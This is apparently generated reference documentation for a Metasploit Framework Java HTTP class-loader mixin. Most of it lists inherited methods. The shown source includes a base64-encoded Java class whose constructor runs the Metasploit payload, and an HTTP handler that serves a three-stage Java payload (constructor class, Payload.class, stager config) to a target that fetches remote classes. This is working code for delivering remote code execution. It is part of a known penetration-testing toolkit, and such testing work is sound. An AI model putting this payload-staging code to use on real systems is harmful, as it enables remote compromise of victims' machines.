Module: Msf::Exploit::Remote::Java::HTTP::ClassLoader

Includes:
HttpServer
Defined in:
lib/msf/core/exploit/java/http/classloader.rb

Instance Attribute Summary

Attributes included from SocketServer

#service

Instance Method Summary collapse

Methods included from HttpServer

#add_resource, #add_robots_resource, #autofilter, #check_dependencies, #cleanup, #cli, #cli=, #close_client, #create_response, #fingerprint_user_agent, #get_resource, #get_uri, #hardcoded_uripath, #print_prefix, #random_uri, #regenerate_payload, #remove_resource, #report_user_agent, #resource_uri, #send_local_redirect, #send_not_found, #send_redirect, #send_response, #send_robots, #srvhost_addr, #srvport, #use_zlib

Methods included from Auxiliary::Report

#active_db?, #create_cracked_credential, #create_credential, #create_credential_and_login, #create_credential_login, #db, #db_warning_given?, #get_client, #get_host, #inside_workspace_boundary?, #invalidate_login, #mytask, #myworkspace, #myworkspace_id, #report_auth_info, #report_client, #report_exploit, #report_host, #report_loot, #report_note, #report_service, #report_vuln, #report_web_form, #report_web_page, #report_web_site, #report_web_vuln, #store_cred, #store_local, #store_loot

Methods included from Metasploit::Framework::Require

optionally, optionally_active_record_railtie, optionally_include_metasploit_credential_creation, #optionally_include_metasploit_credential_creation, optionally_require_metasploit_db_gem_engines

Methods included from TcpServer

#on_client_close, #on_client_connect, #ssl, #ssl_cert, #ssl_cipher, #ssl_compression

Methods included from SocketServer

#_determine_server_comm, #cleanup, #exploit, #on_client_data, #primer, #regenerate_payload, #srvhost, #srvport, #stop_service, #via_string_for_ip

Instance Method Details

#class_nameObject


114
115
116
# File 'lib/msf/core/exploit/java/http/classloader.rb', line 114

def class_name
  @class_name ||= rand_text_alpha(8..42).capitalize
end

#constructor_classObject

import metasploit.Payload;

public class Metasploit {
  public Metasploit() {
    try {
      Payload.main(null);
    }
    catch (Exception e) {}
  }
}

98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
# File 'lib/msf/core/exploit/java/http/classloader.rb', line 98

def constructor_class
  klass = Rex::Text.decode_base64(
    <<~EOF
      yv66vgAAADMAFQoABQAMCgANAA4HAA8HABAHABEBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAN
      U3RhY2tNYXBUYWJsZQcAEAcADwwABgAHBwASDAATABQBABNqYXZhL2xhbmcvRXhjZXB0aW9u
      AQAKTWV0YXNwbG9pdAEAEGphdmEvbGFuZy9PYmplY3QBABJtZXRhc3Bsb2l0L1BheWxvYWQB
      AARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgAhAAQABQAAAAAAAQABAAYABwABAAgA
      AAA3AAEAAgAAAA0qtwABAbgAAqcABEyxAAEABAAIAAsAAwABAAkAAAAQAAL/AAsAAQcACgAB
      BwALAAAA
    EOF
  )

  # Replace length-prefixed string "Metasploit" with a random one
  klass.sub("\x00\x0aMetasploit", packed_class_name)
end

#initialize(info = {}) ⇒ Object


12
13
14
15
16
17
18
# File 'lib/msf/core/exploit/java/http/classloader.rb', line 12

def initialize(info = {})
  super(update_info(info,
    'Stance' => Msf::Exploit::Stance::Aggressive
  ))

  deregister_options('URIPATH')
end

#on_request_uri(cli, request) ⇒ Object


33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
# File 'lib/msf/core/exploit/java/http/classloader.rb', line 33

def on_request_uri(cli, request)
  vprint_status("#{request.method} #{request.uri} requested")

  unless %w[HEAD GET].include?(request.method)
    vprint_error("Ignoring #{request.method} request")
    return
  end

  if request.method == 'HEAD'
    whitelist = %W[
      /#{class_name}.class
      /metasploit/Payload.class
      /metasploit.dat
    ]

    unless whitelist.include?(request.uri)
      vprint_error('Sending 404')
      return send_not_found(cli)
    end

    vprint_good('Sending 200')
    return send_response(cli, '')
  end

  case request.uri
  # Stage 1
  when "/#{class_name}.class"
    vprint_good('Sending constructor class')
    # This contains the constructor that will call our JavaPayload
    res = constructor_class
  # Stage 2
  when '/metasploit/Payload.class'
    vprint_good('Sending payload class')
    # This is our JavaPayload as a compiled class
    res = MetasploitPayloads.read('java/metasploit/Payload.class')
  # Stage 3
  when '/metasploit.dat'
    vprint_good('Sending payload config')
    # This tells the target how to address the payload; this is the magic!
    res = payload_instance.stager_config
  else
    vprint_error('Sending 404')
    return send_not_found(cli)
  end

  send_response(
    cli,
    res,
    # file -I says application/x-java-applet, but I don't believe it
    'Content-Type' => 'application/octet-stream'
  )
end

#packed_class_nameObject


118
119
120
# File 'lib/msf/core/exploit/java/http/classloader.rb', line 118

def packed_class_name
  "#{[class_name.length].pack('n')}#{class_name}"
end

#start_service(opts = {}) ⇒ Object


20
21
22
23
24
25
26
27
28
29
30
31
# File 'lib/msf/core/exploit/java/http/classloader.rb', line 20

def start_service(opts = {})
  # XXX: This is a workaround until we can take SSL in opts
  ssl = datastore['SSL']
  datastore['SSL'] = false

  super(opts.merge('Path' => '/'))

  classloader_uri = get_uri
  datastore['SSL'] = ssl

  classloader_uri
end